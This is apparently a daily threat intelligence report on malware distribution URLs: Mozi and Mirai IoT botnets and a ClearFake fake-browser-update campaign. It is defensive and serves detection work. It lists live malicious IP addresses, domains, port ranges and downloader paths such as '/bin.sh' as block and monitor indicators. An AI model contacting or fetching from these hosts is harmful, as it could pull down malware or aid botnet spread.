On April 21, 2026, threat intelligence monitoring identified 51 active malware distribution URLs tracked by abuse.ch URLhaus. The threat landscape is dominated by IoT-targeting malware families, with Mozi and Mirai botnets accounting for the majority of observed activity. Additionally, ClearFake malware continues to leverage social engineering tactics through compromised domains. All malicious infrastructure identified consists of command-and-control endpoints distributing shell scripts and ELF binaries designed to compromise Linux-based IoT devices.
The geographic distribution of malicious infrastructure spans multiple regions, with significant concentrations in Asian IP space. Shell script downloaders (bin.sh) represent the primary infection vector, facilitating multi-stage malware deployment on compromised devices. The ClearFake campaign demonstrates sophisticated techniques using dynamic domain generation with the 'wate7pugnac.in.net' and 'overfeed-social.in.net' infrastructure. No critical vulnerabilities, law enforcement actions, or policy updates were reported during this period.
Organizations operating IoT devices, edge infrastructure, and Linux-based systems should prioritize network segmentation, implement robust authentication mechanisms, and monitor for unusual outbound connections to the identified IP ranges. The sustained activity of Mozi malware—despite its original infrastructure disruption—indicates continued botnet operations through decentralized peer-to-peer mechanisms.
Widespread distribution of Mozi and Mirai malware targeting Linux-based IoT devices through 51 active malicious URLs
16 active URLs distributing Mozi botnet malware via shell scripts and ELF binaries. Mozi targets IoT devices through exploiting weak credentials and known vulnerabilities, establishing persistent access through DHT-based peer-to-peer infrastructure. Infrastructure spans IP ranges in China (42.x, 27.x, 125.x, 182.x) and other Asian regions.
8 active URLs associated with Mirai botnet variants distributing malware to compromised IoT devices. Observed infrastructure includes IPs: 153.3.11.210, 222.127.48.186, 94.244.36.34, 183.214.149.164, 180.243.65.33, 175.152.157.149, 27.189.30.220, and 58.23.74.213. Mirai continues to target default credentials and unpatched vulnerabilities in routers, cameras, and DVRs.
4 HTTPS URLs identified distributing ClearFake malware through domains 'wate7pugnac.in.net' and 'overfeed-social.in.net'. ClearFake typically employs browser update social engineering tactics to deliver malware payloads. The consistent UUID pattern (05fe317c-0981-4de2-bc8a-930d369db441) across URLs suggests coordinated campaign infrastructure. Subdomain variations include 'faststep5', 'cle-arbox6', 'open-wind1', and 'soft-cha-ir2'.
23 additional malware distribution URLs identified without specific family attribution. Infrastructure predominantly consists of compromised or malicious hosts serving shell scripts and binaries on high-numbered ports (36000-60000 range), consistent with IoT botnet command-and-control patterns. Geographic distribution includes IPs across Asia-Pacific, Europe, and Latin America.
Analysis of malware delivery mechanisms and infection chains observed in active campaigns
The majority of IoT malware campaigns utilize bin.sh shell scripts as first-stage downloaders. These scripts typically contain commands to download architecture-specific ELF binaries, disable security features, establish persistence, and initiate botnet communications. The '/i' endpoint pattern suggests simplified index-based binary serving.
Multiple samples specifically identified as 32-bit ELF MIPS binaries indicate targeting of router and embedded device architectures. MIPS-based devices include consumer routers, enterprise networking equipment, and industrial control systems, representing high-value botnet recruitment targets.
Malicious infrastructure consistently uses non-standard high-numbered ports (36000-60000 range) for command-and-control communications. This technique evades basic firewall rules that typically focus on well-known ports and may indicate automated exploitation tools generating randomized port configurations.
Recommended indicators and detection strategies based on observed threat activity
Monitor for outbound HTTP connections to high-numbered ports (35000-60000) from IoT devices, especially targeting paths '/i' and '/bin.sh'. Investigate connections from embedded Linux devices to Asian IP ranges (particularly 27.x, 42.x, 113.x, 125.x, 175.x, 182.x networks). Establish baseline traffic profiles for IoT devices to detect anomalous communication patterns.
Block or monitor domains matching patterns: '*.wate7pugnac.in.net' and '*.overfeed-social.in.net'. Look for HTTPS connections with paths containing UUIDs followed by '/ck-' prefixed files claiming to be Google-related. User education should emphasize that legitimate browser updates never require manual downloads from third-party domains.